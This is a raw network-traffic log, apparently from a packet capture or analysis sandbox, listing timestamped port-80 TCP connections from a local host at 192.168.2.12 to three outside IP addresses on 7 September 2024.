                                                                                                                                                                    Sep 7, 2024 15:37:33.017154932 CEST5676680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.017313957 CEST5676680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.027506113 CEST805676688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.027591944 CEST5676680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.169238091 CEST5676780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:33.175328016 CEST805676764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.175400019 CEST5676780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:33.180763960 CEST5676780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:33.186239958 CEST805676764.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.186333895 CEST5676780192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:33.224304914 CEST5676880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:33.229226112 CEST805676845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.229304075 CEST5676880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:33.229408979 CEST5676880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:33.234972000 CEST805676845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.235038996 CEST5676880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:33.930488110 CEST5676980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.935364008 CEST805676988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.935470104 CEST5676980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.946403027 CEST5676980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:33.951471090 CEST805676988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:33.951519012 CEST5676980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:34.055027008 CEST5677080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:34.060060978 CEST805677045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:34.060164928 CEST5677080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:34.060255051 CEST5677080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:34.065418005 CEST805677045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:34.065474987 CEST5677080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:34.203939915 CEST5677180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.209578991 CEST805677164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:34.209649086 CEST5677180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.209722042 CEST5677180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.216176033 CEST805677164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:34.216233015 CEST5677180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.688215017 CEST5677280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.696417093 CEST805677264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:34.696511030 CEST5677280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.696569920 CEST5677280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:34.702845097 CEST805677264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:34.702908993 CEST5677280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:35.303538084 CEST5677380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.308651924 CEST805677388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:35.308723927 CEST5677380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.308825016 CEST5677380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.314174891 CEST805677388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:35.314270973 CEST5677380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.773889065 CEST5677480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.780293941 CEST805677488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:35.780359983 CEST5677480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.780441046 CEST5677480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:35.785820007 CEST805677488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:35.785877943 CEST5677480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:36.166259050 CEST5677580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.172405005 CEST805677545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:36.172472954 CEST5677580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.172559977 CEST5677580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.179368019 CEST805677545.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:36.179423094 CEST5677580192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.208116055 CEST5677680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.213083029 CEST805677645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:36.213186979 CEST5677680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.213279963 CEST5677680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.218898058 CEST805677645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:36.218987942 CEST5677680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:36.337759018 CEST5677780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:36.342741966 CEST805677788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:36.342823029 CEST5677780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:36.342907906 CEST5677780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:36.348064899 CEST805677788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:36.348151922 CEST5677780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:37.408216953 CEST5981480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:37.413214922 CEST805981445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:37.413284063 CEST5981480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:37.413364887 CEST5981480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:37.419362068 CEST805981445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:37.419442892 CEST5981480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:37.807286024 CEST5981580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:37.812768936 CEST805981564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:37.812829971 CEST5981580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:37.821520090 CEST5981580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:37.826740026 CEST805981564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:37.826793909 CEST5981580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:38.819257021 CEST6002880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:38.825310946 CEST806002888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:38.826060057 CEST6002880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:38.837589979 CEST6002880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:38.842508078 CEST806002888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:38.842725992 CEST6002880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:39.740919113 CEST6002980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:39.745937109 CEST806002964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:39.746021986 CEST6002980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:39.746098042 CEST6002980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:39.752219915 CEST806002964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:39.752285957 CEST6002980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:40.222342014 CEST6003080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:40.227359056 CEST806003045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:40.227447987 CEST6003080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:40.227530003 CEST6003080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:40.232902050 CEST806003045.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:40.233005047 CEST6003080192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:40.267818928 CEST6003180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:40.273010969 CEST806003188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:40.273089886 CEST6003180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:40.273158073 CEST6003180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:40.278259039 CEST806003188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:40.278320074 CEST6003180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:41.442331076 CEST6003280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.448112965 CEST806003245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.448256969 CEST6003280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.448348999 CEST6003280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.454598904 CEST806003245.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.455154896 CEST6003280192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.491606951 CEST6003380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.496433973 CEST806003345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.496529102 CEST6003380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.496623993 CEST6003380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:41.501722097 CEST806003345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.501796007 CEST806003345.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:41.501844883 CEST6003380192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:42.800115108 CEST6003480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.805104017 CEST806003488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.805169106 CEST6003480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.805756092 CEST6003480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.810771942 CEST806003488.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.810838938 CEST6003480192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.838766098 CEST6003580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.843580961 CEST806003588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.843671083 CEST6003580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.843767881 CEST6003580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:42.848818064 CEST806003588.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:42.848938942 CEST6003580192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:44.706574917 CEST6003680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:44.711448908 CEST806003645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.711532116 CEST6003680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:44.711591959 CEST6003680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:44.716702938 CEST806003645.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.716758966 CEST6003680192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:44.737741947 CEST6003780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:44.742665052 CEST806003788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.742722988 CEST6003780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:44.742789984 CEST6003780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:44.747942924 CEST806003788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:44.748014927 CEST6003780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:45.818545103 CEST6003880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:45.823379040 CEST806003845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.823447943 CEST6003880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:45.823520899 CEST6003880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:45.828489065 CEST806003845.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:45.828541040 CEST6003880192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:46.544944048 CEST6003980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:46.549850941 CEST806003964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.549926996 CEST6003980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:46.556461096 CEST6003980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:46.561280966 CEST806003964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.561364889 CEST6003980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:46.928663969 CEST6004080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:46.933468103 CEST806004088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.933536053 CEST6004080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:46.933628082 CEST6004080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:46.938553095 CEST806004088.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:46.938673973 CEST6004080192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.644597054 CEST6004180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.649481058 CEST806004188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.649597883 CEST6004180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.650279999 CEST6004180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.655121088 CEST806004188.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.655174017 CEST6004180192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.678740978 CEST6004280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.684737921 CEST806004288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.684803009 CEST6004280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.684873104 CEST6004280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.689685106 CEST806004288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.689943075 CEST806004288.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.690000057 CEST6004280192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:47.764550924 CEST6004380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:47.769396067 CEST806004364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.769488096 CEST6004380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:47.769587994 CEST6004380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:47.774648905 CEST806004364.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.774691105 CEST6004380192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:47.925188065 CEST6004480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:47.930011034 CEST806004445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.930094004 CEST6004480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:47.930939913 CEST6004480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:47.935791016 CEST806004445.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.935861111 CEST6004480192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:47.992768049 CEST6004580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:47.997632027 CEST806004564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:47.997725010 CEST6004580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:48.008868933 CEST6004580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:48.013777018 CEST806004564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.013839006 CEST6004580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:48.236062050 CEST6004680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.241339922 CEST806004688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.241420984 CEST6004680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.243263006 CEST6004680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.248522997 CEST806004688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.248574972 CEST6004680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.268846989 CEST6004780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:48.273718119 CEST806004745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.273802042 CEST6004780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:48.273904085 CEST6004780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:48.278919935 CEST806004745.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.278970003 CEST6004780192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:48.332329035 CEST6004880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.337280989 CEST806004888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.337351084 CEST6004880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.352655888 CEST6004880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:48.357496977 CEST806004888.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:48.357563972 CEST6004880192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:49.815581083 CEST6004980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:49.820487976 CEST806004988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.820558071 CEST6004980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:49.820657015 CEST6004980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:49.825794935 CEST806004988.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:49.825854063 CEST6004980192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:50.646048069 CEST6005080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:50.651530981 CEST806005064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.651602983 CEST6005080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:50.651674986 CEST6005080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:50.656697035 CEST806005064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.656769991 CEST6005080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:50.923945904 CEST6005180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:50.928849936 CEST806005145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.928924084 CEST6005180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:50.930831909 CEST6005180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:50.935693979 CEST806005145.79.222.138192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:50.935749054 CEST6005180192.168.2.1245.79.222.138
                                                                                                                                                                    Sep 7, 2024 15:37:51.437287092 CEST6005280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.442152977 CEST806005264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.442230940 CEST6005280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.442296982 CEST6005280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.447329998 CEST806005264.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.447417974 CEST6005280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.541541100 CEST6005380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:51.548616886 CEST806005388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.548801899 CEST6005380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:51.555782080 CEST6005380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:51.562768936 CEST806005388.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.562828064 CEST6005380192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:51.650165081 CEST6005480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.655073881 CEST806005464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.655147076 CEST6005480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.665132999 CEST6005480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.669965029 CEST806005464.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.670028925 CEST6005480192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.857541084 CEST6005580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.862437963 CEST806005564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.862587929 CEST6005580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.868258953 CEST6005580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:51.873244047 CEST806005564.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:51.873295069 CEST6005580192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.651901960 CEST6005680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.656702995 CEST806005688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.656761885 CEST6005680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.656853914 CEST6005680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.661916971 CEST806005688.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.661962986 CEST6005680192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.740200043 CEST6005780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.745078087 CEST806005788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.745161057 CEST6005780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.745239019 CEST6005780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.750325918 CEST806005788.198.29.97192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.750384092 CEST6005780192.168.2.1288.198.29.97
                                                                                                                                                                    Sep 7, 2024 15:37:52.799329042 CEST6005880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.804881096 CEST806005864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.804970980 CEST6005880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.805059910 CEST6005880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.810714960 CEST806005864.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.810781002 CEST6005880192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.984802961 CEST6005980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.989769936 CEST806005964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.989830017 CEST6005980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.993235111 CEST6005980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:52.998418093 CEST806005964.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:52.998472929 CEST6005980192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:54.003967047 CEST6006080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:54.008915901 CEST806006064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.009002924 CEST6006080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:54.009229898 CEST6006080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:54.014200926 CEST806006064.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:54.014280081 CEST6006080192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:55.851605892 CEST6006180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:55.856498003 CEST806006164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.858967066 CEST6006180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:55.859023094 CEST6006180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:55.864336967 CEST806006164.70.19.203192.168.2.12
                                                                                                                                                                    Sep 7, 2024 15:37:55.864727020 CEST6006180192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:56.436312914 CEST6006280192.168.2.1264.70.19.203
                                                                                                                                                                    Sep 7, 2024 15:37:56.441379070 CEST806006264.70.19.203192.168.2.12
